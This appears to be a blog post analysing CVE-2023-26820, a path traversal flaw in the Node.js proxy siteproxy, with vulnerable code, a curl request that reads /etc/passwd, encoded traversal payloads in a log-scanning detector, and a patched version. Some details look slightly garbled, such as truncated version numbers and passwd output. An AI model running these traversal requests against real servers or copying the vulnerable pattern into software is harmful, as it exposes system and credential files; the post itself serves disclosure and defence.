CVE-2023-26820 - Path Traversal in siteproxy v1. via index.js – Detailed Exploit Analysis & Mitigation
*By [Your Name], June 2024*
Introduction
Web proxies are popular for managing access and privacy on the internet. But what happens when the proxy itself is insecure? That’s exactly what occurred with siteproxy v1.—a lightweight Node.js proxy server. This package was found exposing user files due to a critical path traversal flaw. In this deep dive, we’ll break down CVE-2023-26820, look at the insecure code, demonstrate exploitation, and give actionable fixes.
What is CVE-2023-26820?
CVE-2023-26820 is a vulnerability in siteproxy version 1. that allows an attacker to perform a path traversal attack using specially crafted URLs. This means an attacker can request files outside the intended proxy directory, potentially leaking sensitive server files.
Main Cause: The server fails to sanitize user input in HTTP request paths, allowing users to request arbitrary files with sequences like ../.
- Package: siteproxy
- Component: index.js
- Discovered by: Y4tacker
- Reference: GHSA-xpxj-7hjm-q7mc
- CVE Database: NVD CVE-2023-26820
Here’s what the vulnerable code in index.js typically looks like:

```javascript
// index.js (vulnerable version)
const http = require('http');
const fs = require('fs');
const path = require('path');

const server = http.createServer((req, res) => {
  // BAD: the raw request URL is used directly as a file path,
  // so "../" segments are honoured by the filesystem.
  let filePath = './public' + req.url;
  fs.readFile(filePath, (err, data) => {
    if (err) {
      res.statusCode = 404;
      res.end('File not found');
    } else {
      res.statusCode = 200;
      res.end(data);
    }
  });
});

server.listen(808, () => console.log('Proxy server running'));
```
This code directly appends user input (req.url) to the server's file path without normalizing or validating it, so the filesystem resolves any ../ segments the client supplies.
1. Normal use-case
A user opens: http://localhost:808/index.html
=> Loads ./public/index.html as intended.
2. Exploit with Path Traversal
An attacker sends:
http://localhost:808/../../../../etc/passwd
Under the hood:
- The code builds the path: ./public/../../../../etc/passwd
- On UNIX systems, this points to /etc/passwd
Sample curl command:

```
curl http://localhost:808/../../../../etc/passwd
```

Output:

```
root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# Many more lines...
```
Why Is This Dangerous?
- Information Disclosure: Attackers can see files like /etc/passwd, application configs, API keys, etc.
- Potential for Remote Code Execution: If sensitive configs or credentials are leaked, further server compromise is possible.
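Traversal attempts like the one above leave a clear trace in access logs, and a defender should expect them to arrive percent-encoded as well as plain. The following is an added example, not code from the original post or from siteproxy: a small scanner over constructed combined-format access log lines that decodes each request path (bounded repeated decoding, so single- and double-encoded dot segments are both seen) and flags any path containing a ".." segment or a NUL byte. The log format, IP addresses and timestamps are all constructed for the example; findTraversalAttempts and isTraversal are assumed names.

```javascript
// Added example (not from the original post): scan access-log lines for
// path-traversal attempts against a file-serving proxy like the one above.
// Combined-log-format lines are constructed for this example.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Decode percent-encoding repeatedly (bounded) so encoded dot segments are
// visible; a malformed escape stops decoding and keeps the last good value.
function fullyDecode(s, rounds = 3) {
  let cur = s;
  for (let i = 0; i < rounds; i++) {
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch {
      break;
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// A request target is suspicious when, after decoding and stripping the query
// string, any path segment is exactly ".." or the path carries a NUL byte.
// Segments like "..a" are ordinary names and are not flagged.
function isTraversal(rawTarget) {
  const decoded = fullyDecode(rawTarget.split('?')[0]);
  if (decoded.includes('\0')) return true;
  return decoded.split(/[\/\\]/).some((seg) => seg === '..');
}

// Parse each line and return the flagged requests with their decoded path.
function findTraversalAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const [, ip, ts, method, target, status] = m;
    if (isTraversal(target)) {
      hits.push({
        ip,
        ts,
        method,
        target,
        status: Number(status),
        decoded: fullyDecode(target.split('?')[0]),
      });
    }
  }
  return hits;
}

// Constructed sample log: two benign requests and three traversal attempts
// (plain, single-encoded and double-encoded) from the same client.
const SAMPLE_LOG = [
  '198.51.100.4 - - [01/Jun/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [01/Jun/2024:10:00:03 +0000] "GET /../../../../etc/passwd HTTP/1.1" 200 1432 "-" "curl/7.88.1"',
  '203.0.113.7 - - [01/Jun/2024:10:00:05 +0000] "GET /images/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 19 "-" "curl/7.88.1"',
  '203.0.113.7 - - [01/Jun/2024:10:00:09 +0000] "GET /static/..%252f..%252fetc%252fpasswd HTTP/1.1" 404 19 "-" "curl/7.88.1"',
  '198.51.100.4 - - [01/Jun/2024:10:00:12 +0000] "GET /docs/..a/file.html HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const h of findTraversalAttempts(SAMPLE_LOG)) {
    console.log(`${h.ip} ${h.status} ${h.target} -> ${h.decoded}`);
  }
}
```

Note that a 200 status on a flagged line (the second sample) is the signal that the server actually served the file; 404s show the attempt was made but did not succeed against that path. Alerting on the decoded form rather than the raw target keeps the rule from missing encoded variants.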
How to Fix (Proper Input Validation)
Always sanitize and validate user input before using it as a file path.
Solution 1 – Using path.normalize & checking base directory
```javascript
const http = require('http');
const fs = require('fs');
const path = require('path');

const BASE_DIR = path.resolve('./public');

const server = http.createServer((req, res) => {
  let userPath;
  try {
    // Strip the query string, then decode once; a malformed escape throws.
    userPath = decodeURIComponent(req.url.split('?')[0]);
  } catch {
    res.statusCode = 400;
    res.end('Bad request');
    return;
  }
  // path.join already normalizes "../" segments; normalize() is kept for clarity.
  const safePath = path.normalize(path.join(BASE_DIR, userPath));
  // Require the separator: a bare prefix check would accept a sibling
  // directory such as "public2" as if it were inside "public".
  if (safePath !== BASE_DIR && !safePath.startsWith(BASE_DIR + path.sep)) {
    res.statusCode = 400;
    res.end('Illegal path');
    return;
  }
  fs.readFile(safePath, (err, data) => {
    if (err) {
      res.statusCode = 404;
      res.end('File not found');
    } else {
      res.statusCode = 200;
      res.end(data);
    }
  });
});

server.listen(808, () => console.log('Proxy server running'));
```
References
- NVD CVE-2023-26820 Details
- GHSA-xpxj-7hjm-q7mc Advisory
- Node.js Path Traversal Guide
- Path Traversal in JavaScript Explained
Final Thoughts
CVE-2023-26820 is a textbook example of why user input must never be trusted—especially with file paths. Even for non-sensitive apps like proxies, one oversight can expose the entire server. Always review code for path traversal vectors and use built-in utilities for sanitization.
Do you run Node.js web servers? Check for similar issues today!
*For questions, comments, or corrections, please reach out via GitHub.*
Timeline
Published on: 04/07/2023 03:15:00 UTC
Last modified on: 04/13/2023 18:04:00 UTC